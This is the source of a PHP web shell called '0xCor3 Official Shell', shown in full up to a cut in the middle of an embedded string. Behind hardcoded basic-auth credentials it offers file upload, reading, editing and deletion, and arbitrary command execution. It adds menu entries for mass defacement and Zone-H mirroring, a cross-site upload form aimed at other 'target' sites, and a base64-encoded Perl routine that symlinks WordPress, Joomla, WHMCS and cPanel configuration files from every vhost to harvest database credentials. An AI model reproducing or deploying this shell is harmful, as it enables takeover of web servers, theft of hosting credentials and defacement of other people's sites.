0xCor3 Official Shell

1. <?php
2. $user = "0xCor3";
3.  
4. $pass = "Koplak";
5.  
6. if (($_SERVER["PHP_AUTH_USER"] != $user) || (($_SERVER["PHP_AUTH_PW"]) != $pass))
7.  
8. {
9.  
10. header("WWW-Authenticate: Basic realm=\"To Login Shell You Must Input This Form\"");
11.  
12. header("HTTP/1.0 401 Unauthorized");
13.  
14. exit();
15.  
16. }
17. error_reporting(0);
18. set_time_limit(0);
19.  
20. if(get_magic_quotes_gpc()){
21. foreach($_POST as $key=>$value){
22. $_POST[$key] = stripslashes($value);
23. }
24. }
25. echo '<!DOCTYPE HTML>
26. <html>
27. <head>
28. <link href="" rel="stylesheet" type="text/css">
29. <link href="https://fonts.googleapis.com/css?family=Bungee+Shade|Monoton|Nova+Square" rel="stylesheet">
30. <title>|-| Sh3LL |-|</title>
31. <style>
32. body{
33. font-family: "nova square", cursive;
34. background-color: black;
35. color: red;
36. }
37. #content tr:hover{
38. background-color: black;
39. text-shadow:0px 0px 10px #fff;
40. }
41. #content .first{
42. background-color: black;
43. }
44. table{
45. border: 10px red dotted;
46. }
47. a{
48. color: red;
49. text-decoration: none;
50. }
51. a:hover{
52. color:yellow;
53. text-shadow:0px 0px 10px #ffffff;
54. }
55. input,select,textarea{
56. border: 5px #000000 solid;
57. -moz-border-radius: 5px;
58. -webkit-border-radius:5px;
59. border-radius:5px;
60. }
61. </style>
62. </head>
63. <body>
64. <h1><center><font color="red" face="Nova Square">0xCor3 Official Shell</font></center></h1>
65. <center><font color="red" size="3">Greetz: </font> <br> <marquee direction="left" width="60%"><font color="white" size="3" face="Nova Square">- LdxMpuzz6 - KING GECKO - vinsm0ke - Anon99Husein - Rio - R13z - ./D14 - ./Mr. HanzID - H34VENT - Mr. Sep7ic - PH4NTER - Con7ext - AsteriX - Azzatssins - XnonGermX - 1!0N7!N - MrMoonz - 5ud0 - Aweu404 - S1R110R- l0c4lh0st - galehDotId - Kazuya404 - GaTs404 - ZakirDotID - Mr.Spongebob - Mr.Luciferz - Al1337W0rm - Mr.7z - R13z - X-Injector - Ex!M3R - FRK48 - Mr.Lubis -</marquee></font></center>
66. <table width="1250" border="0" cellpadding="5" cellspacing="3" align="center">
67. <tr><td><font color="white">Kamu Di Directory Ini :</font> ';
68. if(isset($_GET['path'])){
69. $path = $_GET['path'];
70. }else{
71. $path = getcwd();
72. }
73. $path = str_replace('\\','/',$path);
74. $paths = explode('/',$path);
75.  
76. foreach($paths as $id=>$pat){
77. if($pat == '' && $id == 0){
78. $a = true;
79. echo '<a href="?path=/">/</a>';
80. continue;
81. }
82. if($pat == '') continue;
83. echo '<a href="?path=';
84. for($i=0;$i<=$id;$i++){
85. echo "$paths[$i]";
86. if($i != $id) echo "/";
87. }
88. echo '">'.$pat.'</a>/';
89. }
90. echo '</td></tr><tr><td>';
91. if(isset($_FILES['file'])){
92. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
93. echo '<font color="green">Upload Berhasil</font><br />';
94. }else{
95. echo '<font color="red">Upload Gagal</font><br/>';
96. }
97. }
98. echo "<li>[ <a href='?'>Home</a> ]</li>";
99. echo "<li>[ <a href='?path=$path&do=cmd'>Command</a> ]</li>";
100. echo "<li>[ <a href='?path=$path&do=config'>Get Config</a> ]</li>";
101. echo "<li>[ <a href='?path=$path&do=jumping'>Jumping</a> ]</li>";
102. echo "<li>[ <a href='?path=$path&do=csrf'>CSRF</a> ]</li>";
103. echo "<li>[ <a href='?path=$path&do=zoneh'>Zone-H Mirror</a> ]</li>";
104. echo "<li>[ <a href='?path=$path&do=adminer'>Pasang Adminer</a> ]</li>";
105. echo "<li>[ <a href='?path=$path&do=mass_deface'>Mass Deface</a> ]</li>";
106. echo '<form enctype="multipart/form-data" method="POST">
107. <font color="white">Upload File :</font> <input type="file" name="file" />
108. <input type="submit" value="upload" />
109. </form>
110. </td></tr>';
111. if(isset($_GET['filesrc'])){
112. echo "<tr><td>Current File : ";
113. echo $_GET['filesrc'];
114. echo '</tr></td></table><br />';
115. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
116. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
117. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
118. if($_POST['opt'] == 'chmod'){
119. if(isset($_POST['perm'])){
120. if(chmod($_POST['path'],$_POST['perm'])){
121. echo '<font color="green">Change Permission Berhasil</font><br/>';
122. }else{
123. echo '<font color="red">Change Permission Gagal</font><br />';
124. }
125. }
126. echo '<form method="POST">
127. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
128. <input type="hidden" name="path" value="'.$_POST['path'].'">
129. <input type="hidden" name="opt" value="chmod">
130. <input type="submit" value="Go" />
131. </form>';
132. }elseif($_POST['opt'] == 'rename'){
133. if(isset($_POST['newname'])){
134. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
135. echo '<font color="green">Ganti Nama Berhasil</font><br/>';
136. }else{
137. echo '<font color="red">Ganti Nama Gagal</font><br />';
138. }
139. $_POST['name'] = $_POST['newname'];
140. }
141. echo '<form method="POST">
142. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
143. <input type="hidden" name="path" value="'.$_POST['path'].'">
144. <input type="hidden" name="opt" value="rename">
145. <input type="submit" value="Go" />
146. </form>';
147. }elseif($_POST['opt'] == 'edit'){
148. if(isset($_POST['src'])){
149. $fp = fopen($_POST['path'],'w');
150. if(fwrite($fp,$_POST['src'])){
151. echo '<font color="green">Berhasil Edit File</font><br/>';
152. }else{
153. echo '<font color="red">Gagal Edit File</font><br/>';
154. }
155. fclose($fp);
156. }
157. echo '<form method="POST">
158. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
159. <input type="hidden" name="path" value="'.$_POST['path'].'">
160. <input type="hidden" name="opt" value="edit">
161. <input type="submit" value="Save" />
162. </form>';
163. }
164. echo '</center>';
165. }else{
166. echo '</table><br/><center>';
167. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
168. if($_POST['type'] == 'dir'){
169. if(rmdir($_POST['path'])){
170. echo '<font color="green">Directory Terhapus</font><br/>';
171. }else{
172. echo '<font color="red">Directory Gagal Terhapus </font><br/>';
173. }
174. }elseif($_POST['type'] == 'file'){
175. if(unlink($_POST['path'])){
176. echo '<font color="green">File Terhapus</font><br/>';
177. }else{
178. echo '<font color="red">File Gagal Dihapus</font><br/>';
179. }
180. }
181. }
182. echo '</center>';
183. $scandir = scandir($path);
184. echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
185. <tr class="first">
186. <td><center>Name</peller></center></td>
187. <td><center>Size</peller></center></td>
188. <td><center>Permission</peller></center></td>
189. <td><center>Modify</peller></center></td>
190. </tr>';
191.  
192. foreach($scandir as $dir){
193. if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
194. echo '<tr>
195. <td><a href="?path='.$path.'/'.$dir.'">'.$dir.'</a></td>
196. <td><center>--</center></td>
197. <td><center>';
198. if(is_writable($path.'/'.$dir)) echo '<font color="green">';
199. elseif(!is_readable($path.'/'.$dir)) echo '<font color="red">';
200. echo perms($path.'/'.$dir);
201. if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font>';
202.  
203. echo '</center></td>
204. <td><center><form method="POST" action="?option&path='.$path.'">
205. <select name="opt">
206. <option value="">Select</option>
207. <option value="delete">Delete</option>
208. <option value="chmod">Chmod</option>
209. <option value="rename">Rename</option>
210. </select>
211. <input type="hidden" name="type" value="dir">
212. <input type="hidden" name="name" value="'.$dir.'">
213. <input type="hidden" name="path" value="'.$path.'/'.$dir.'">
214. <input type="submit" value=">">
215. </form></center></td>
216. </tr>';
217. }
218. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
219. foreach($scandir as $file){
220. if(!is_file($path.'/'.$file)) continue;
221. $size = filesize($path.'/'.$file)/1024;
222. $size = round($size,3);
223. if($size >= 1024){
224. $size = round($size/1024,2).' MB';
225. }else{
226. $size = $size.' KB';
227. }
228.  
229. echo '<tr>
230. <td><a href="?filesrc='.$path.'/'.$file.'&path='.$path.'">'.$file.'</a></td>
231. <td><center>'.$size.'</center></td>
232. <td><center>';
233. if(is_writable($path.'/'.$file)) echo '<font color="green">';
234. elseif(!is_readable($path.'/'.$file)) echo '<font color="red">';
235. echo perms($path.'/'.$file);
236. if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>';
237. echo '</center></td>
238. <td><center><form method="POST" action="?option&path='.$path.'">
239. <select name="opt">
240. <option value="">Select</option>
241. <option value="delete">Delete</option>
242. <option value="chmod">Chmod</option>
243. <option value="rename">Rename</option>
244. <option value="edit">Edit</option>
245. </select>
246. <input type="hidden" name="type" value="file">
247. <input type="hidden" name="name" value="'.$file.'">
248. <input type="hidden" name="path" value="'.$path.'/'.$file.'">
249. <input type="submit" value=">">
250. </form></center></td>
251. </tr>';
252. }
253. echo '</table>
254. </div></body>
255. </html>';
256. }
257. echo "<center>Copyright &copy; ".date("Y")." - <a href='http://www.official-0xcor3.ga/' target='_blank'><font color=lime>0xCor3</font></a></center>";
258. function perms($file){
259. $perms = fileperms($file);
260.  
261. if (($perms & 0xC000) == 0xC000) {
262. // Socket
263. $info = 's';
264. } elseif (($perms & 0xA000) == 0xA000) {
265. // Symbolic Link
266. $info = 'l';
267. } elseif (($perms & 0x8000) == 0x8000) {
268. // Regular
269. $info = '-';
270. } elseif (($perms & 0x6000) == 0x6000) {
271. // Block special
272. $info = 'b';
273. } elseif (($perms & 0x4000) == 0x4000) {
274. // Directory
275. $info = 'd';
276. } elseif (($perms & 0x2000) == 0x2000) {
277. // Character special
278. $info = 'c';
279. } elseif (($perms & 0x1000) == 0x1000) {
280. // FIFO pipe
281. $info = 'p';
282. } else {
283. // Unknown
284. $info = 'u';
285. }
286.  
287. // Owner
288. $info .= (($perms & 0x0100) ? 'r' : '-');
289. $info .= (($perms & 0x0080) ? 'w' : '-');
290. $info .= (($perms & 0x0040) ?
291. (($perms & 0x0800) ? 's' : 'x' ) :
292. (($perms & 0x0800) ? 'S' : '-'));
293.  
294. // Group
295. $info .= (($perms & 0x0020) ? 'r' : '-');
296. $info .= (($perms & 0x0010) ? 'w' : '-');
297. $info .= (($perms & 0x0008) ?
298. (($perms & 0x0400) ? 's' : 'x' ) :
299. (($perms & 0x0400) ? 'S' : '-'));
300.  
301. // World
302. $info .= (($perms & 0x0004) ? 'r' : '-');
303. $info .= (($perms & 0x0002) ? 'w' : '-');
304. $info .= (($perms & 0x0001) ?
305. (($perms & 0x0200) ? 't' : 'x' ) :
306. (($perms & 0x0200) ? 'T' : '-'));
307.  
308. return $info;
309. }
310. if($_GET['do'] == 'cmd') {
311. echo "<form method='post'>
312. <font style='text-decoration: underline;'>".$user."@".$ip.": ~ $ </font>
313. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
314. </form>";
315. if($_POST['do_cmd']) {
316. echo "<pre>".exe($_POST['cmd'])."</pre>";
317. }
318. }
319. elseif($_GET['do'] == 'csrf') {
320. echo '<center><form method="post">
321. URL Web Target : <input type="text" name="url" size="50" height="10" placeholder="http://www.target.co.li/[path]/upload.php" style="margin: 5px auto; padding-left: 5px;" required><br>
322. Type Name: <input type="text" name="pf" size="50" height="10" placeholder="Filedata / files[] / qqfile / userfile / file_field / dan lain lain" style="margin: 5px auto; padding-left: 5px;" required><br>
323. <input type="submit" name="d" value="Lock Target!">
324. </form></center></td> </tr>';
325. $url = $_POST['url'];
326. $pf = $_POST['pf'];
327. $d = $_POST['d'];
328. if($d) {
329. echo "<center><form method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$pf'><input type='submit' name='g' value='Explo17!'></form></center>";
330. }; }
331. elseif($_GET['do'] == 'config') {
332. $idx = mkdir("0xS_config", 0777);
333. $isi_htc = "Options FollowSymLinks MultiViews Indexes ExecCGI\nRequire None\nSatisfy Any\nAddType application/x-httpd-cgi .cin\nAddHandler cgi-script .cin\nAddHandler cgi-script .cin";
334. $htc = fopen("0xS_config/.htaccess","w");
335. fwrite($htc, $isi_htc);
336. fclose($htc);
337. if(preg_match("/vhosts|vhost/", $path)) {
338. $link_config = str_replace($_SERVER['DOCUMENT_ROOT'], "", $path);
339. $vhost = "IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpvcGVuZGlyKG15ICRkaXIgLCAiL3Zhci93d3cvdmhvc3RzLyIpOw0KZm9yZWFjaChzb3J0IHJlYWRkaXIgJGRpcikgew0KICAgIG15ICRpc0RpciA9IDA7DQogICAgJGlzRGlyID0gMSBpZiAtZCAkXzsNCiRzaXRlc3MgPSAkXzsNCg0KDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3Atb3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb20vaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL29zY29tbWVyY2UvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2UudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb21tZXJjZXMvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2VzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3BwaW5nL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXNob3BwaW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NhbGUvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNhbGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYW1lbWJlci9jb25maWcuaW5jLnBocCcsJHNpdGVzcy4nLWFtZW1iZXIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnLmluYy5waHAnLCRzaXRlc3MuJy1hbWVtYmVyMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXJzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictbWVtYmVycy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlczEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW0vaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLWZvcnVtLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtcy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictZm9ydW1zLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FkbWluL2NvbmYucGhwJywkc2l0ZXNzLictNS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictNC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dwL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvV1Avd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ByZXNzL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cDEzLXByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictd29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2Jsb2cvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93b3JkcHJlc3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3Mvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1uZXdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ldy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLW5ldy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9nL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmxvZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmV0YS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9ncy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLWJsb2dzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1ob21lLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Byb3RhbC93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3Mtc2l0ZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYWluL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtbWFpbi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy90ZXN0L3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtdGVzdC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcmNhZGUvZnVuY3Rpb25zL2RiY2xhc3MucGhwJywkc2l0ZXNzLictaWJwcm9hcmNhZGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJjYWRlL2Z1bmN0aW9ucy9kYmNsYXNzLnBocCcsJHNpdGVzcy4nLWlicHJvYXJjYWRlLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2pvb21sYS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYTIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvcHJvdGFsL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9qb28vY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb28udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY21zL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLWNtcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXNpdGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbWFpbi9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYS1tYWluLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9uZXcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtaG9tZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy92Yi9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmJ+Y29uZmlnLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiMy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIzfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jYy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIxfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9mb3J1bS9pbmNsdWRlcy9jbGFzc19jb3JlLnBocCcsJHNpdGVzcy4nLXZibHV0dGlufmNsYXNzX2NvcmUucGhwLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAxLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NjL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobTE1LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NlbnRyYWwvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tY2VudHJhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93aG0vd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0td2htY3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htL1dITUNTL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLVdITUNTLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobWMvV0hNL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htYy1XSE0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG1jcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0L2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcG9ydC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zZWN1cmUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1zdWN1cmUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1Y3VyZS13aG0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VjdXJlLXdobWNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NwYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWNwYW5lbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9wYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXBhbmVsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3QvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3M